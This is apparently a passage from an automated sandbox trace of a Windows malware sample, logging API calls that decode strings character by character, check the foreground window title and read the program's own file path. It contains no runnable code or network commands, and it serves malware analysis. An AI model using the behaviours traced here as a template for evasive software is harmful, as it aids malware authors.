lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.492] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.492] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.493] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.493] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.493] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.541] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.541] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.542] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.542] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.543] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.543] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.544] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.544] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.544] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.544] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.545] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.545] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.545] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.545] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.545] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.546] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.546] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.546] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.546] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.547] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.547] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.547] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.547] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.548] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.548] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.548] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.548] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.548] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.549] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.549] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.549] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.549] GetForegroundWindow () returned 0x20086 [0179.549] GetLastError () returned 0x0 [0179.549] SysStringLen (param_1=" ") returned 0xff [0179.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.549] SysStringLen (param_1=" ") returned 0xff [0179.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.549] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.549] GetLastError () returned 0x0 [0179.550] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.550] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.550] SysStringLen (param_1="Pr") returned 0x2 [0179.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x1150ca4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0179.550] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0179.550] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0179.550] GetFocus () returned 0x0 [0179.550] lstrlenA (lpString="Pr") returned 2 [0179.550] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0179.551] IsWindow (hWnd=0x103c4) returned 1 [0179.551] IsWindow (hWnd=0x103c4) returned 1 [0179.551] IsWindow (hWnd=0x103c4) returned 1 [0179.551] IsWindow (hWnd=0x103c4) returned 1 [0179.551] GetFocus () returned 0x0 [0179.551] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0179.551] GetFocus () returned 0x0 [0179.551] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0179.551] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0179.551] GetFocus () returned 0x0 [0179.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0179.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0179.552] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.552] VarBstrCmp (bstrLeft="Pr", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.552] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0179.552] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 1 [0179.552] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x0, lParam=0x28f4cc) returned 0x0 [0179.552] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0179.552] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0179.552] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0179.552] DispatchMessageA (lpMsg=0x28f5e8) returned 0x1 [0179.552] GetExitCodeThread (in: hThread=0x124, lpExitCode=0x28f4c0 | out: lpExitCode=0x28f4c0) returned 1 [0179.552] ResumeThread (hThread=0x124) returned 0x0 [0179.552] SetThreadPriority (hThread=0x124, nPriority=0) returned 1 [0179.553] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0179.553] GetTickCount () returned 0x1d199fd [0179.553] IsWindowVisible (hWnd=0x103b8) returned 0 [0179.553] Sleep (dwMilliseconds=0x0) [0179.589] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0179.589] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0179.590] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0179.590] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0179.591] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0179.591] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0179.591] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0179.591] GetTickCount () returned 0x1d19a2c [0179.591] GetTickCount () returned 0x1d19a2c [0179.591] GetTickCount () returned 0x1d19a2c [0179.591] GetTickCount () returned 0x1d19a2c [0179.592] IsWindowVisible (hWnd=0x103b8) returned 0 [0179.592] Sleep (dwMilliseconds=0x0) [0179.635] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0179.635] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0179.636] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0179.636] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0179.636] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0179.636] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.637] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0179.637] GetTickCount () returned 0x1d19a5a [0179.637] GetTickCount () returned 0x1d19a5a [0179.637] GetTickCount () returned 0x1d19a5a [0179.637] GetTickCount () returned 0x1d19a5a [0179.637] IsWindowVisible (hWnd=0x103b8) returned 0 [0179.638] Sleep (dwMilliseconds=0x0) [0179.682] FileSystemObject:IDispatch:GetIDsOfNames (in: 